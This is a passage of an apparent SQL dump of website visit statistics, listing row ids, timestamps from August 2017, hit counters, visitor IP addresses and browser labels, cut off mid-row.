(150605,1504037241,1,1,0,0,'51.255.65.83','other'),(150606,1504037446,1,1,0,0,'46.219.245.82','chrome'),(150607,1504037727,1,1,0,0,'164.132.162.155','other'),(150608,1504037877,1,1,0,0,'91.196.178.135','chrome'),(150609,1504038552,1,1,0,0,'95.221.213.231','msie'),(150610,1504038718,2,2,0,0,'82.193.102.149','other'),(150611,1504038807,1,1,0,0,'91.196.178.135','chrome'),(150612,1504039071,1,1,0,0,'91.196.178.68','chrome'),(150613,1504039243,1,1,0,0,'141.8.142.45','other'),(150614,1504040089,1,1,0,0,'157.55.39.74','other'),(150615,1504040463,1,1,0,0,'217.182.132.88','other'),(150616,1504040970,1,1,0,0,'51.255.65.64','other'),(150617,1504042232,1,1,0,0,'62.149.29.58','chrome'),(150618,1504042475,1,1,0,0,'51.255.65.86','other'),(150619,1504042844,1,0,1,0,'66.249.76.108',''),(150620,1504043070,1,0,1,0,'66.249.66.75',''),(150621,1504043072,1,1,0,0,'92.113.153.141','firefox'),(150622,1504044170,1,0,1,0,'66.249.76.89',''),(150623,1504044305,1,1,0,0,'51.255.71.120','other'),(150624,1504044819,1,1,0,0,'217.182.132.96','other'),(150625,1504046312,1,1,0,0,'178.154.200.7','other'),(150626,1504046754,1,1,0,0,'164.132.162.160','other'),(150627,1504047374,1,1,0,0,'51.255.65.96','other'),(150628,1504047379,1,1,0,0,'51.255.65.89','other'),(150629,1504047724,1,1,0,0,'8.29.198.26','other'),(150630,1504048217,1,0,1,0,'66.249.66.157',''),(150631,1504048432,1,1,0,0,'217.182.132.187','other'),(150632,1504048550,1,1,0,0,'141.8.142.21','other'),(150633,1504048634,1,0,1,0,'66.249.66.155',''),(150634,1504049155,1,1,0,0,'91.209.11.236','other'),(150635,1504049387,1,1,0,0,'217.182.132.180','other'),(150636,1504049500,1,1,0,0,'163.172.255.19','chrome'),(150637,1504049769,1,1,0,0,'5.45.207.32','other'),(150638,1504050359,1,1,0,0,'137.74.207.159','other'),(150639,1504050597,1,0,1,0,'66.249.76.108',''),(150640,1504050845,1,1,0,0,'40.77.167.109','other'),(150641,1504050984,1,1,0,0,'141.8.183.1','other'),(150642,1504052267,1,1,0,0,'141.8.142.56','other'),(150643,1504052617,1,1,0,0,'217.182.132.91','other'),(150644,1504052705,1,1,0,0,'204.152.217.194','msie'),(150645,1504053467,1,1,0,0,'51.255.65.43','other'),(150646,1504053493,1,1,0,0,'95.108.181.63','other'),(150647,1504054089,1,1,0,0,'51.255.65.76','other'),(150648,1504054832,2,2,0,0,'141.8.183.5','other'),(150649,1504055090,1,1,0,0,'141.8.142.45','other'),(150650,1504055209,1,0,1,0,'66.249.76.108',''),(150651,1504055227,1,1,0,0,'217.182.132.191','other'),(150652,1504056084,1,1,0,0,'217.182.132.93','other'),(150653,1504056729,1,1,0,0,'51.255.65.56','other'),(150654,1504057143,1,1,0,0,'107.167.104.126','other'),(150655,1504057301,1,1,0,0,'173.212.216.160','other'),(150656,1504057373,1,1,0,0,'217.182.132.16','other'),(150657,1504057998,1,1,0,0,'207.46.13.118','other'),(150658,1504058133,1,1,0,0,'5.45.207.32','other'),(150659,1504058556,1,1,0,0,'8.29.198.25','other'),(150660,1504058583,1,1,0,0,'217.182.132.182','other'),(150661,1504058624,1,1,0,0,'51.255.65.32','other'),(150662,1504058696,1,1,0,0,'91.209.11.236','other'),(150663,1504059252,1,1,0,0,'213.180.203.32','other'),(150664,1504059485,1,1,0,0,'141.8.183.5','other'),(150665,1504059489,1,1,0,0,'37.9.113.78','other'),(150667,1504060187,1,1,0,0,'217.182.132.14','other'),(150668,1504060428,1,1,0,0,'51.255.65.79','other'),(150669,1504060679,1,1,0,0,'95.108.181.69','other'),(150670,1504061490,1,0,1,0,'66.249.76.109',''),(150671,1504063694,1,1,0,0,'51.255.65.18','other'),(150672,1504064263,1,1,0,0,'91.209.11.236','other'),(150673,1504065018,1,1,0,0,'51.255.65.95','other'),(150674,1504065243,1,1,0,0,'91.209.11.236','other'),(150675,1504065727,1,1,0,0,'217.182.132.176','other'),(150676,1504066121,1,1,0,0,'207.46.13.118','other'),(150677,1504066379,1,1,0,0,'217.182.132.178','other'),(150678,1504066458,1,1,0,0,'40.77.167.109','other'),(150679,1504066797,1,1,0,0,'213.180.203.32','other'),(150680,1504067094,1,1,0,0,'217.182.132.186','other'),(150681,1504067227,1,1,0,0,'89.178.6.166','chrome'),(150682,1504067457,1,1,0,0,'46.211.6.170','chrome'),(150683,1504067799,1,1,0,0,'40.77.167.109','other'),(150684,1504068007,1,1,0,0,'51.255.71.114','other'),(150685,1504068300,1,1,0,0,'91.196.178.71','firefox'),(150686,1504068483,1,1,0,0,'5.45.207.64','other'),(150687,1504068734,1,1,0,0,'217.182.132.61','other'),(150688,1504068957,1,1,0,0,'95.108.181.69','other'),(150689,1504069379,1,1,0,0,'8.29.198.27','other'),(150690,1504069381,1,1,0,0,'51.255.65.65','other'),(150691,1504069542,1,1,0,0,'51.255.71.133','other'),(150692,1504069688,1,1,0,0,'178.154.200.27','other'),(150693,1504070030,1,1,0,0,'217.182.132.77','other'),(150694,1504070395,1,1,0,0,'217.182.132.192','other'),(150695,1504070404,1,1,0,0,'91.196.178.67','chrome'),(150696,1504070546,1,1,0,0,'91.196.178.69','chrome'),(150697,1504070839,1,1,0,0,'217.182.132.29','other'),(150698,1504071020,1,1,0,0,'91.209.11.236','other'),(150699,1504071546,1,1,0,0,'217.182.132.73','other'),(150700,1504072123,1,1,0,0,'51.255.65.52','other'),(150701,1504072261,1,1,0,0,'95.108.181.69','other'),(150702,1504072357,1,1,0,0,'95.135.213.214','chrome'),(150703,1504072730,1,0,1,0,'66.249.76.107',''),(150704,1504073133,1,1,0,0,'40.77.167.86','other'),(150705,1504073213,1,1,0,0,'141.8.183.5','other'),(150706,1504073407,2,2,0,0,'193.70.39.201','other'),(150707,1504073533,1,1,0,0,'217.182.132.14','other'),(150708,1504073537,1,1,0,0,'91.196.178.72','chrome'),(150709,1504073836,1,1,0,0,'164.132.162.164','other'),(150710,1504073855,1,1,0,0,'164.132.162.156','other'),(150711,1504073874,1,1,0,0,'91.196.178.65','chrome'),(150712,1504074148,1,1,0,0,'141.8.183.5','other'),(150713,1504074265,1,1,0,0,'217.182.132.52','other'),(150714,1504074981,1,1,0,0,'109.86.69.227','firefox'),(150715,1504075843,1,1,0,0,'217.182.132.85','other'),(150716,1504076199,1,1,0,0,'217.182.132.37','other'),(150717,1504076925,1,1,0,0,'178.154.200.7','other'),(150718,1504077049,1,1,0,0,'193.93.184.171','chrome'),(150719,1504077092,1,1,0,0,'141.105.141.171','chrome'),(150720,1504077165,1,1,0,0,'141.8.183.5','other'),(150721,1504077290,1,0,1,0,'66.249.76.89',''),(150722,1504077415,1,1,0,0,'180.76.15.13','other'),(150723,1504078007,1,1,0,0,'51.255.65.85','other'),(150724,1504078057,1,1,0,0,'141.8.183.1','other'),(150725,1504078275,1,1,0,0,'95.108.181.69','other'),(150726,1504078307,1,1,0,0,'217.182.132.78','other'),(150727,1504078372,1,1,0,0,'51.255.65.7','other'),(150728,1504078386,1,1,0,0,'51.255.71.130','other'),(150729,1504078679,1,1,0,0,'91.196.179.138','firefox'),(150730,1504078857,1,1,0,0,'51.255.65.55','other'),(150731,1504078894,1,1,0,0,'51.255.65.18','other'),(150732,1504079032,1,1,0,0,'217.182.132.69','other'),(150733,1504079402,1,1,0,0,'91.196.178.65','chrome'),(150734,1504079745,1,1,0,0,'91.196.179.138','firefox'),(150735,1504080210,1,1,0,0,'8.29.198.27','other'),(150736,1504080335,1,1,0,0,'51.255.65.42','other'),(150737,1504080696,1,1,0,0,'80.91.174.90','other'),(150738,1504080835,1,1,0,0,'141.8.183.1','other'),(150739,1504080857,1,1,0,0,'66.249.76.107','chrome'),(150740,1504081163,1,1,0,0,'5.45.207.64','other'),(150741,1504081170,1,1,0,0,'217.182.132.176','other'),(150742,1504081568,1,1,0,0,'51.255.65.51','other'),(150743,1504081654,1,1,0,0,'95.135.90.253','chrome'),(150744,1504082201,1,1,0,0,'62.183.126.198','chrome'),(150745,1504082293,1,1,0,0,'95.47.12.31','chrome'),(150746,1504082672,1,1,0,0,'95.108.181.63','other'),(150747,1504082982,5,5,0,0,'62.210.251.247','other'),(150748,1504083017,1,0,1,0,'66.249.76.108',''),(150749,1504083181,1,0,1,0,'66.249.76.89',''),(150750,1504083952,1,1,0,0,'80.91.174.90','other'),(150751,1504084190,1,1,0,0,'164.132.162.154','other'),(150752,1504084195,1,1,0,0,'141.8.183.5','other'),(150753,1504084652,1,1,0,0,'217.182.132.69','other'),(150754,1504084819,1,1,0,0,'37.54.23.3','chrome'),(150755,1504085009,1,1,0,0,'163.172.255.19','chrome'),(150756,1504085308,1,1,0,0,'217.182.132.241','other'),(150757,1504085456,1,1,0,0,'37.53.134.162','opera'),(150758,1504085524,1,1,0,0,'51.255.65.10','other'),(150759,1504085778,1,1,0,0,'80.91.174.90','other'),(150760,1504085928,1,1,0,0,'91.196.178.164','chrome'),(150761,1504085977,1,1,0,0,'91.196.179.138','firefox'),(150762,1504086439,1,1,0,0,'51.255.65.77','other'),(150763,1504086628,2,2,0,0,'64.120.56.210','other'),(150764,1504086759,1,1,0,0,'5.45.207.64','other'),(150765,1504086837,1,1,0,0,'91.196.178.164','chrome'),(150766,1504087900,1,1,0,0,'37.53.150.77','chrome'),(150767,1504088429,1,1,0,0,'51.255.65.73','other'),(150768,1504088444,3,3,0,0,'91.209.11.236','other'),(150769,1504088683,1,1,0,0,'37.73.203.164','chrome'),(150770,1504088828,1,1,0,0,'51.255.65.96','other'),(150771,1504088991,1,1,0,0,'5.45.207.56','other'),(150772,1504089158,1,1,0,0,'91.196.178.164','chrome'),(150773,1504089556,1,1,0,0,'217.182.132.59','other'),(150774,1504089872,1,1,0,0,'51.255.65.78','other'),(150775,1504089988,1,1,0,0,'217.182.132.188','other'),(150776,1504090315,1,1,0,0,'46.201.81.160','firefox'),(150777,1504090659,1,1,0,0,'217.182.132.60','other'),(150778,1504090923,1,1,0,0,'51.255.65.52','other'),(150779,1504090939,1,1,0,0,'5.45.207.64','other'),(150780,1504091060,1,1,0,0,'8.29.198.26','other'),(150781,1504091650,1,1,0,0,'40.77.167.86','other'),(150782,1504091755,1,1,0,0,'178.154.200.7','other'),(150783,1504092103,1,1,0,0,'91.209.11.236','other'),(150784,1504092356,1,1,0,0,'217.182.132.182','other'),(150785,1504092612,1,1,0,0,'217.182.132.76','other'),(150786,1504092721,1,1,0,0,'91.196.178.69','chrome'),(150787,1504092739,1,1,0,0,'173.252.85.208','other'),(150788,1504092753,1,1,0,0,'173.252.84.116','other'),(150789,1504092755,1,1,0,0,'66.220.146.148','other'),(150790,1504092836,1,1,0,0,'162.210.196.97','other'),(150791,1504093268,2,2,0,0,'91.196.178.35','chrome'),(150792,1504093385,1,1,0,0,'51.255.65.47','other'),(150793,1504093450,1,1,0,0,'37.73.230.168','chrome'),(150794,1504093537,1,1,0,0,'141.8.183.1','other'),(150795,1504093538,2,2,0,0,'5.45.207.64','other'),(150796,1504093539,1,1,0,0,'37.9.113.163','other'),(150797,1504093543,2,2,0,0,'141.8.142.45','other'),(150798,1504093581,1,1,0,0,'5.45.207.26','other'),(150799,1504093584,1,1,0,0,'87.250.224.54','other'),(150800,1504093588,1,1,0,0,'37.9.113.78','other'),(150801,1504093695,1,1,0,0,'91.196.178.65','other'),(150802,1504093705,1,1,0,0,'91.196.178.72','firefox'),(150803,1504093895,1,1,0,0,'5.45.207.32','other'),(150804,1504093948,1,1,0,0,'188.166.79.160','chrome'),(150805,1504094002,1,1,0,0,'180.76.15.26','other'),(150806,1504094004,1,1,0,0,'176.36.64.10','chrome'),(150807,1504094027,1,1,0,0,'37.54.85.68','chrome'),(150808,1504094033,1,1,0,0,'141.8.142.21','other'),(150809,1504094131,2,2,0,0,'141.8.183.5','other'),(150810,1504094291,1,1,0,0,'178.154.200.27','other'),(150811,1504094353,1,1,0,0,'195.10.210.49','chrome'),(150812,1504094425,1,1,0,0,'178.154.200.7','other'),(150813,1504094514,1,1,0,0,'66.249.76.107','chrome'),(150814,1504094972,1,1,0,0,'5.45.207.64','other'),(150815,1504095006,1,0,1,0,'66.249.76.89',''),(150816,1504095246,1,1,0,0,'91.196.178.69','chrome'),(150817,1504095280,1,1,0,0,'66.102.9.59','chrome'),(150818,1504095535,1,1,0,0,'137.74.207.119','other'),(150819,1504095630,1,1,0,0,'51.255.65.14','other'),(150820,1504095651,1,1,0,0,'141.8.183.1','other'),(150821,1504095897,1,1,0,0,'94.254.246.206','chrome'),(150822,1504095919,1,1,0,0,'91.209.11.236','other'),(150823,1504095959,1,1,0,0,'51.255.65.6','other'),(150824,1504096082,1,1,0,0,'217.69.133.203','other'),(150825,1504096115,1,1,0,0,'178.154.200.27','other'),(150826,1504096119,1,1,0,0,'178.154.200.36','other'),(150827,1504096222,1,1,0,0,'217.182.132.55','other'),(150828,1504096248,1,1,0,0,'46.219.6.40','chrome'),(150829,1504096332,1,1,0,0,'5.45.207.32','other'),(150830,1504096532,1,1,0,0,'51.255.65.75','other'),(150831,1504096545,1,1,0,0,'51.255.65.39','other'),(150832,1504096591,1,1,0,0,'46.211.96.79','chrome'),(150833,1504096821,1,1,0,0,'185.117.242.20','chrome'),(150834,1504097020,1,1,0,0,'95.108.181.69','other'),(150835,1504097105,1,1,0,0,'37.9.113.163','other'),(150836,1504097206,1,1,0,0,'95.108.181.63','other'),(150837,1504097210,1,1,0,0,'141.8.142.21','other'),(150838,1504097630,1,1,0,0,'51.255.65.7','other'),(150839,1504097789,1,1,0,0,'91.196.178.68','firefox'),(150840,1504097952,1,1,0,0,'5.45.207.32','other'),(150841,1504098288,1,1,0,0,'163.172.255.19','chrome'),(150842,1504098603,1,1,0,0,'217.64.127.166','chrome'),(150843,1504098814,1,1,0,0,'51.255.65.12','other'),(150844,1504098823,1,1,0,0,'91.196.178.134','chrome'),(150845,1504098825,1,1,0,0,'46.133.162.214','other'),(150846,1504098883,1,1,0,0,'87.76.247.36','chrome'),(150847,1504099107,1,1,0,0,'95.108.181.58','other'),(150848,1504099490,1,1,0,0,'95.215.94.94','chrome'),(150849,1504099522,1,1,0,0,'91.196.177.46','chrome'),(150850,1504099527,1,1,0,0,'95.108.181.69','other'),(150851,1504099571,1,1,0,0,'37.9.113.180','other'),(150852,1504099772,1,1,0,0,'46.164.130.92','firefox'),(150853,1504100569,1,1,0,0,'51.255.65.40','other'),(150854,1504100710,1,1,0,0,'137.74.207.164','other'),(150855,1504101004,1,0,1,0,'66.249.76.109',''),(150856,1504101391,1,1,0,0,'178.154.200.7','other'),(150857,1504101461,1,1,0,0,'217.182.132.149','other'),(150858,1504101469,1,1,0,0,'178.209.42.84','chrome'),(150859,1504101649,1,1,0,0,'176.113.170.104','chrome'),(150860,1504101796,1,1,0,0,'95.108.181.69','other'),(150861,1504101898,1,1,0,0,'8.29.198.26','other'),(150862,1504102043,1,1,0,0,'195.211.173.204','firefox'),(150863,1504102597,1,1,0,0,'51.255.65.54','other'),(150864,1504102793,1,1,0,0,'37.73.205.2','chrome'),(150865,1504103425,1,1,0,0,'94.179.246.23','chrome'),(150866,1504103492,1,1,0,0,'95.108.181.63','other'),(150867,1504104334,1,1,0,0,'91.196.179.138','firefox'),(150868,1504104380,1,1,0,0,'37.73.216.234','chrome'),(150869,1504104731,1,1,0,0,'217.182.132.84','other'),(150870,1504105101,1,1,0,0,'141.8.142.21','other'),(150871,1504105340,1,1,0,0,'185.11.31.142','chrome'),(150872,1504105387,1,1,0,0,'213.180.203.32','other'),(150873,1504105423,2,0,2,0,'66.249.76.109',''),(150874,1504106941,1,1,0,0,'141.8.142.45','other'),(150875,1504107154,1,1,0,0,'217.182.132.88','other'),(150876,1504107236,1,1,0,0,'95.135.90.253','chrome'),(150877,1504107262,1,1,0,0,'51.255.65.96','other'),(150878,1504107555,1,1,0,0,'51.255.71.111','other'),(150879,1504108036,1,1,0,0,'51.255.65.48','other'),(150880,1504108114,1,1,0,0,'34.251.79.185','other'),(150881,1504108154,1,1,0,0,'91.196.178.165','chrome'),(150882,1504109866,1,1,0,0,'66.249.76.89','chrome'),(150883,1504110005,1,1,0,0,'141.8.142.45','other'),(150884,1504111034,1,1,0,0,'5.45.207.32','other'),(150885,1504111631,1,1,0,0,'46.105.102.203','firefox'),(150886,1504112722,1,1,0,0,'8.29.198.27','other'),(150887,1504112762,1,1,0,0,'91.196.178.72','firefox'),(150888,1504112846,1,1,0,0,'91.196.178.103','chrome'),(150889,1504113141,1,1,0,0,'87.250.224.75','other'),(150890,1504113410,1,1,0,0,'5.45.207.64','other'),(150891,1504113610,1,1,0,0,'91.196.178.131','chrome'),(150892,1504113631,1,1,0,0,'95.108.181.69','other'),(150893,1504114229,1,1,0,0,'91.196.178.162','chrome'),(150894,1504114964,1,1,0,0,'91.196.178.136','chrome'),(150895,1504115275,1,1,0,0,'141.8.183.1','other'),(150896,1504115823,1,1,0,0,'37.54.17.88','chrome'),(150897,1504116160,1,1,0,0,'66.249.66.151','chrome'),(150898,1504116263,1,1,0,0,'91.196.178.135','chrome'),(150899,1504116756,1,1,0,0,'46.211.145.237','chrome'),(150900,1504117728,1,1,0,0,'46.133.235.61','chrome'),(150901,1504118132,1,1,0,0,'141.8.183.5','other'),(150902,1504118885,1,1,0,0,'5.255.253.2','other'),(150903,1504119106,2,2,0,0,'91.209.11.236','other'),(150904,1504119367,1,1,0,0,'37.54.17.88','chrome'),(150905,1504119409,1,1,0,0,'91.196.178.67','chrome'),(150906,1504119526,1,1,0,0,'37.54.23.3','chrome'),(150907,1504119616,1,1,0,0,'195.10.210.49','chrome'),(150908,1504120196,1,1,0,0,'91.209.11.236','other'),(150909,1504121370,1,1,0,0,'91.209.11.236','other'),(150910,1504121456,1,1,0,0,'178.154.200.7','other'),(150911,1504121552,1,1,0,0,'180.76.15.134','other'),(150912,1504121589,1,1,0,0,'207.46.13.113','other'),(150913,1504121710,1,1,0,0,'66.249.66.155','chrome'),(150914,1504122090,1,1,0,0,'163.172.255.19','chrome'),(150915,1504123547,1,1,0,0,'8.29.198.26','other'),(150916,1504124048,2,2,0,0,'46.229.168.79','other'),(150917,1504124062,4,4,0,0,'46.229.168.69','other'),(150918,1504124065,1,1,0,0,'46.229.168.67','other'),(150919,1504124095,4,4,0,0,'46.229.168.65','other'),(150920,1504124109,2,2,0,0,'46.229.168.71','other'),(150921,1504124136,1,1,0,0,'46.229.168.66','other'),(150922,1504124149,3,3,0,0,'46.229.168.74','other'),(150923,1504124198,1,1,0,0,'46.229.168.75','other'),(150924,1504124222,3,3,0,0,'46.229.168.73','other'),(150925,1504124244,2,2,0,0,'46.229.168.76','other'),(150926,1504124284,1,1,0,0,'46.229.168.77','other'),(150927,1504124295,1,1,0,0,'46.229.168.70','other'),(150928,1504124325,1,1,0,0,'46.229.168.78','other'),(150929,1504124502,2,2,0,0,'91.209.11.236','other'),(150930,1504124887,1,1,0,0,'217.182.132.240','other'),(150931,1504125240,1,1,0,0,'51.255.65.67','other'),(150932,1504126268,2,2,0,0,'91.209.11.236','other'),(150933,1504126384,1,1,0,0,'46.211.102.221','chrome'),(150934,1504127010,1,1,0,0,'5.45.207.32','other'),(150935,1504127682,1,1,0,0,'217.182.132.185','other'),(150936,1504127855,1,1,0,0,'141.8.142.45','other'),(150937,1504128138,1,1,0,0,'178.154.200.27','other'),(150938,1504128822,1,1,0,0,'217.182.132.58','other'),(150939,1504129037,1,1,0,0,'217.182.132.152','other'),(150940,1504129546,1,1,0,0,'217.182.132.56','other'),(150941,1504130925,1,1,0,0,'141.8.183.1','other'),(150942,1504131130,1,1,0,0,'217.182.132.79','other'),(150943,1504132264,1,1,0,0,'37.9.113.78','other'),(150944,1504132321,1,1,0,0,'51.255.65.30','other'),(150945,1504132580,1,1,0,0,'217.182.132.5','other'),(150946,1504133781,1,1,0,0,'51.255.65.69','other'),(150947,1504133963,1,1,0,0,'217.182.132.82','other'),(150948,1504134378,1,1,0,0,'8.29.198.27','other'),(150949,1504134449,1,1,0,0,'164.132.164.180','other'),(150950,1504134508,1,1,0,0,'185.105.116.95','firefox'),(150951,1504134598,1,1,0,0,'141.8.142.45','other'),(150952,1504134900,1,1,0,0,'207.46.13.113','other'),(150953,1504135312,1,1,0,0,'5.255.253.4','other'),(150954,1504135418,1,1,0,0,'213.180.203.32','other'),(150955,1504135957,1,1,0,0,'51.255.71.128','other'),(150956,1504136222,1,1,0,0,'66.249.76.91','chrome'),(150957,1504136403,1,1,0,0,'51.255.65.92','other'),(150958,1504137946,1,1,0,0,'137.74.207.109','other'),(150960,1504138500,1,1,0,0,'51.255.71.131','other'),(150961,1504138544,1,1,0,0,'51.255.65.60','other'),(150962,1504138703,1,1,0,0,'141.8.183.1','other'),(150963,1504138884,1,1,0,0,'66.249.76.108','chrome'),(150964,1504138898,1,1,0,0,'217.182.132.78','other'),(150965,1504139110,1,1,0,0,'51.255.65.36','other'),(150966,1504139146,1,1,0,0,'40.77.167.86','other'),(150967,1504139288,1,1,0,0,'95.108.181.69','other'),(150968,1504139913,1,1,0,0,'141.8.183.5','other'),(150969,1504140173,1,1,0,0,'5.45.207.26','other'),(150970,1504140256,1,1,0,0,'217.182.132.148','other'),(150971,1504140425,1,1,0,0,'51.255.65.60','other'),(150972,1504141504,1,1,0,0,'217.182.132.77','other'),(150973,1504142287,1,1,0,0,'217.182.132.73','other'),(150974,1504142580,1,1,0,0,'66.249.66.157','chrome'),(150975,1504142738,1,1,0,0,'164.132.162.154','other'),(150976,1504143626,1,1,0,0,'217.182.132.85','other'),(150977,1504143929,1,1,0,0,'51.255.65.68','other'),(150978,1504144118,1,1,0,0,'51.255.65.74','other'),(150979,1504144577,1,1,0,0,'51.255.65.51','other'),(150980,1504144873,1,1,0,0,'217.182.132.155','other'),(150981,1504145133,1,1,0,0,'37.9.113.163','other'),(150982,1504145205,1,1,0,0,'8.29.198.27','other'),(150983,1504145316,1,1,0,0,'51.255.65.45','other'),(150984,1504146150,1,1,0,0,'217.182.132.153','other'),(150985,1504146303,1,1,0,0,'91.209.11.236','other'),(150986,1504146508,1,1,0,0,'51.255.65.40','other'),(150987,1504147232,1,1,0,0,'163.172.255.19','chrome'),(150988,1504147468,1,1,0,0,'217.182.132.63','other'),(150989,1504148224,1,1,0,0,'141.8.142.45','other'),(150990,1504148382,1,1,0,0,'91.209.11.236','other'),(150991,1504148458,1,1,0,0,'51.255.71.110','other'),(150992,1504148595,1,1,0,0,'137.74.203.194','other'),(150993,1504149358,1,1,0,0,'217.182.132.53','other'),(150994,1504149448,1,1,0,0,'217.182.132.5','other'),(150995,1504149681,1,1,0,0,'141.8.142.45','other'),(150996,1504149767,1,1,0,0,'217.182.132.91','other'),(150997,1504149827,1,1,0,0,'91.209.11.236','other'),(150998,1504150278,1,1,0,0,'95.108.181.63','other'),(150999,1504150647,1,1,0,0,'51.255.65.91','other'),(151000,1504150818,1,1,0,0,'51.255.65.52','other'),(151001,1504152243,1,1,0,0,'217.182.132.190','other'),(151002,1504152971,1,1,0,0,'51.255.65.31','other'),(151003,1504153768,1,1,0,0,'217.182.132.91','other'),(151004,1504153820,1,1,0,0,'91.196.178.39','chrome'),(151005,1504154115,1,1,0,0,'141.8.142.45','other'),(151006,1504154347,1,1,0,0,'51.255.71.98','other'),(151007,1504154912,2,2,0,0,'91.209.11.236','other'),(151008,1504154969,1,1,0,0,'91.196.178.65','firefox'),(151009,1504155662,1,0,1,0,'66.249.66.74',''),(151010,1504155774,1,1,0,0,'51.255.65.84','other'),(151011,1504156038,1,1,0,0,'8.29.198.26','other'),(151012,1504156580,1,1,0,0,'91.209.11.236','other'),(151013,1504156693,1,1,0,0,'95.132.62.89','other'),(151014,1504157022,1,1,0,0,'141.8.183.1','other'),(151015,1504157123,1,1,0,0,'40.77.167.136','other'),(151016,1504157668,1,1,0,0,'51.255.65.31','other'),(151017,1504157896,1,1,0,0,'51.255.71.121','other'),(151018,1504158057,1,1,0,0,'91.209.11.236','other'),(151019,1504158166,1,1,0,0,'51.255.65.51','other'),(151020,1504158280,1,1,0,0,'141.8.142.45','other'),(151021,1504159549,1,1,0,0,'217.182.132.7','other'),(151022,1504159606,1,1,0,0,'217.182.132.191','other'),(151023,1504159955,1,1,0,0,'51.255.65.13','other'),(151024,1504160078,1,1,0,0,'91.196.178.131','chrome'),(151025,1504160342,1,1,0,0,'5.45.207.32','other'),(151026,1504160494,1,1,0,0,'107.21.1.8','other'),(151027,1504161034,2,2,0,0,'91.209.11.236','other'),(151028,1504161750,1,1,0,0,'213.180.203.32','other'),(151029,1504161887,1,1,0,0,'164.132.162.160','other'),(151030,1504161891,1,1,0,0,'91.196.178.68','firefox'),(151031,1504162043,1,1,0,0,'51.255.71.111','other'),(151032,1504162056,1,1,0,0,'91.196.179.138','firefox'),(151033,1504162071,1,1,0,0,'51.255.65.87','other'),(151034,1504162150,1,1,0,0,'95.132.12.160','firefox'),(151035,1504162184,1,1,0,0,'46.161.9.39','chrome'),(151036,1504162201,1,1,0,0,'51.255.71.125','other'),(151037,1504162230,1,1,0,0,'217.182.132.61','other'),(151038,1504162753,1,1,0,0,'91.209.11.236','other'),(151039,1504163081,1,1,0,0,'178.154.200.7','other'),(151040,1504163487,1,1,0,0,'141.8.183.5','other'),(151041,1504163950,1,1,0,0,'51.255.65.93','other'),(151042,1504164173,1,1,0,0,'217.182.132.17','other'),(151043,1504164214,1,1,0,0,'217.182.132.157','other'),(151044,1504164382,1,1,0,0,'51.255.65.8','other'),(151045,1504164439,1,1,0,0,'91.209.11.236','other'),(151046,1504164675,1,1,0,0,'217.69.133.5','other'),(151047,1504164944,2,2,0,0,'141.8.183.1','other'),(151048,1504164969,1,1,0,0,'66.249.76.89','chrome'),(151049,1504165838,1,1,0,0,'51.255.65.56','other'),(151050,1504165881,1,1,0,0,'5.45.207.64','other'),(151051,1504165932,1,1,0,0,'51.255.65.74','other'),(151052,1504165938,1,1,0,0,'66.249.66.155','chrome'),(151053,1504166016,1,1,0,0,'142.4.200.37','other'),(151054,1504166022,1,1,0,0,'164.132.162.159','other'),(151055,1504166180,1,0,1,0,'66.249.76.108',''),(151056,1504166468,1,1,0,0,'137.74.207.114','other'),(151057,1504166809,1,1,0,0,'40.77.167.136','other'),(151058,1504166862,1,1,0,0,'8.29.198.25','other'),(151059,1504167053,1,1,0,0,'217.182.132.21','other'),(151060,1504167453,1,1,0,0,'51.255.71.118','other'),(151061,1504167482,1,1,0,0,'51.255.65.87','other'),(151062,1504167690,1,1,0,0,'141.8.183.1','other'),(151063,1504167769,1,1,0,0,'66.249.66.75','chrome'),(151064,1504167968,2,2,0,0,'91.209.11.236','other'),(151065,1504168380,1,1,0,0,'66.102.9.57','chrome'),(151066,1504168975,1,1,0,0,'217.182.132.17','other'),(151067,1504169669,1,0,1,0,'66.249.76.107',''),(151068,1504169845,1,1,0,0,'46.119.117.165','chrome'),(151069,1504169993,1,1,0,0,'217.182.132.182','other'),(151070,1504170468,1,1,0,0,'37.9.113.163','other'),(151071,1504170504,1,1,0,0,'217.182.132.97','other'),(151072,1504170679,1,1,0,0,'217.182.132.157','other'),(151073,1504170860,1,1,0,0,'178.154.200.7','other'),(151074,1504170974,1,1,0,0,'51.255.71.100','other'),(151075,1504171410,1,1,0,0,'178.154.200.27','other'),(151076,1504171993,1,1,0,0,'141.8.142.21','other'),(151077,1504172068,2,2,0,0,'91.196.178.161','chrome'),(151078,1504172219,1,1,0,0,'51.255.65.89','other'),(151079,1504172626,1,1,0,0,'5.255.253.4','other'),(151080,1504172728,1,1,0,0,'178.92.170.138','chrome'),(151081,1504172944,1,1,0,0,'194.242.102.233','chrome'),(151082,1504173241,1,1,0,0,'87.250.224.150','other'),(151083,1504173969,1,1,0,0,'207.46.13.112','other'),(151084,1504174093,1,1,0,0,'141.8.183.5','other'),(151085,1504174713,2,2,0,0,'46.229.168.69','other'),(151086,1504174750,7,7,0,0,'46.229.168.70','other'),(151087,1504174769,5,5,0,0,'46.229.168.68','other'),(151088,1504174841,4,4,0,0,'46.229.168.73','other'),(151089,1504174859,5,5,0,0,'46.229.168.67','other'),(151090,1504174877,4,4,0,0,'46.229.168.79','other'),(151091,1504174895,7,7,0,0,'46.229.168.72','other'),(151092,1504174913,7,7,0,0,'46.229.168.75','other'),(151093,1504174951,8,8,0,0,'46.229.168.66','other'),(151094,1504174990,3,3,0,0,'46.229.168.77','other'),(151095,1504175003,2,2,0,0,'46.229.168.80','other'),(151096,1504175156,10,10,0,0,'46.229.168.78','other'),(151097,1504175251,1,1,0,0,'37.9.113.163','other'),(151098,1504175292,3,3,0,0,'46.229.168.71','other'),(151099,1504175328,7,7,0,0,'46.229.168.76','other'),(151100,1504175424,1,1,0,0,'94.178.147.183','chrome'),(151101,1504175578,2,2,0,0,'95.108.181.69','other'),(151102,1504175734,5,5,0,0,'46.229.168.70','other'),(151103,1504175760,6,6,0,0,'46.229.168.67','other'),(151104,1504175838,2,2,0,0,'46.229.168.72','other'),(151105,1504175857,2,2,0,0,'46.229.168.74','other'),(151106,1504175874,3,3,0,0,'46.229.168.73','other'),(151107,1504175910,5,5,0,0,'46.229.168.79','other'),(151108,1504175936,1,1,0,0,'87.250.224.75','other'),(151109,1504175937,5,5,0,0,'46.229.168.66','other'),(151110,1504175946,7,7,0,0,'46.229.168.68','other'),(151111,1504175997,1,1,0,0,'141.8.183.5','other'),(151112,1504176054,5,5,0,0,'46.229.168.75','other'),(151113,1504176114,6,6,0,0,'46.229.168.78','other'),(151114,1504176180,4,4,0,0,'46.229.168.80','other'),(151115,1504176223,1,1,0,0,'91.209.11.236','other'),(151116,1504176246,1,1,0,0,'164.132.162.187','other'),(151117,1504176253,3,